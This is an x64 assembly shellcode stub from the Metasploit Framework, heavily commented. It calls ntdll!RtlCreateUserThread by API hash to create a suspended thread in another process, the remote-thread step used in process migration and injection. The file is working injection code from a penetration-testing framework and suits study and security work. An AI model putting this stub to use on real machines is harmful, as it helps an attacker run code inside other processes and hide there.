GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/x64/src/migrate/remotethread.asm
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 296 bytes
; Build: >build.py remotethread
;-----------------------------------------------------------------------------;

; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.

; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
; typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );
;
; Syntax: NASM (Intel operand order), assembled as a flat position-independent blob ([ORG 0]).
; ABI:    entered Microsoft-x64 style (RCX = first argument).
; In:     RCX = LPWOW64CONTEXT (ctx), laid out as the struct below (four 8-byte slots at
;         offsets 0, 8, 16 and 24).
; Out:    RAX = 1 (TRUE) when RtlCreateUserThread returned STATUS_SUCCESS (0), else RAX = 0
;         (FALSE). On success ctx->t.hThread receives the handle of the new thread, which is
;         created suspended (CreateSuspended = TRUE below).
; Clobb:  RSI, RDI, RBP, RCX, RDX, R8, R9, R10, flags, plus whatever the included api_call
;         block clobbers. NOTE(review): RSI, RDI and RBP are callee-saved under the
;         Microsoft x64 ABI and are not preserved here; presumably acceptable for the
;         executex64 caller this stub is built for - confirm before reusing it from an
;         ordinary x64 call site.
; Stack:  RSP is forced to 16-byte alignment on entry and the caller's original RSP is
;         restored from RDI on exit, so the caller's stack pointer is returned intact.

;typedef struct _WOW64CONTEXT
;{
; union
; {
; HANDLE hProcess;              // offset 0  - read into RCX (ProcessHandle)
; BYTE bPadding2[8];
; } h;
; union
; {
; LPVOID lpStartAddress;        // offset 8  - pushed as StartAddress
; BYTE bPadding1[8];
; } s;
; union
; {
; LPVOID lpParameter;           // offset 16 - pushed as StartParameter
; BYTE bPadding2[8];
; } p;
; union
; {
; HANDLE hThread;               // offset 24 - its address is pushed as ThreadHandle (output)
; BYTE bPadding2[8];
; } t;
;} WOW64CONTEXT, * LPWOW64CONTEXT;

[BITS 64]
[ORG 0]
cld ; Clear the direction flag (DF=0 is the ABI default; presumably required by string ops inside the included api_call block).
mov rsi, rcx ; RSI = ctx (RCX is a pointer to our WOW64CONTEXT parameter). Every ctx field is read before the call below; RSI is not needed afterwards.
mov rdi, rsp ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below... RDI is not touched again until 'cleanup'.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ; The return address pushed by 'call start' is this label, i.e. the first byte of the included api_call block.
%include "./src/block/block_api.asm"
start: ;
pop rbp ; Pop off the address of 'api_call' for calling later. RSP is back to 16-byte alignment here.
; setup the parameters for RtlCreateUserThread...
; Arguments 1-4 go in RCX, RDX, R8, R9. Arguments 5-10 are pushed in reverse order so that
; the 5th (StackReserved) sits lowest on the stack, directly above the return address. The
; 32-byte home space the callee expects is, per the cleanup comment below, reserved by
; api_call itself rather than here.
xor r9, r9 ; StackZeroBits = 0 (4th arg); R9 doubles as the NULL pushed for several pointer args below.
push r9 ; ClientID = NULL (10th arg)
lea rax, [rsi+24] ; RAX is now a pointer to ctx->t.hThread
push rax ; ThreadHandle = &ctx->t.hThread (9th arg; receives the new handle on success)
push qword [rsi+16] ; StartParameter = ctx->p.lpParameter (8th arg)
push qword [rsi+8] ; StartAddress = ctx->s.lpStartAddress (7th arg)
push r9 ; StackCommit = NULL (6th arg)
push r9 ; StackReserved = NULL (5th arg; pushed last, so first stack argument)
mov r8, 1 ; CreateSuspended = TRUE (3rd arg) - the new thread starts suspended
xor rdx, rdx ; SecurityDescriptor = NULL (2nd arg)
mov rcx, [rsi] ; ProcessHandle = ctx->h.hProcess (1st arg)
; perform the call to RtlCreateUserThread...
mov r10d, 0x40A438C8 ; hash( "ntdll.dll", "RtlCreateUserThread" ) - api_call is expected to take the target function hash in R10.
call rbp ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
test rax, rax ; check the NTSTATUS return value
jz success ; if its zero we have successfully created the thread so we should return TRUE. Only STATUS_SUCCESS (0) counts; any non-zero status, error or not, yields FALSE.
mov rax, 0 ; otherwise we should return FALSE
jmp cleanup ;
success:
mov rax, 1 ; return TRUE
cleanup:
add rsp, (32 + (8*6)) ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
mov rsp, rdi ; restore the stack (the caller's original, possibly unaligned, RSP saved on entry)
ret ; and return to caller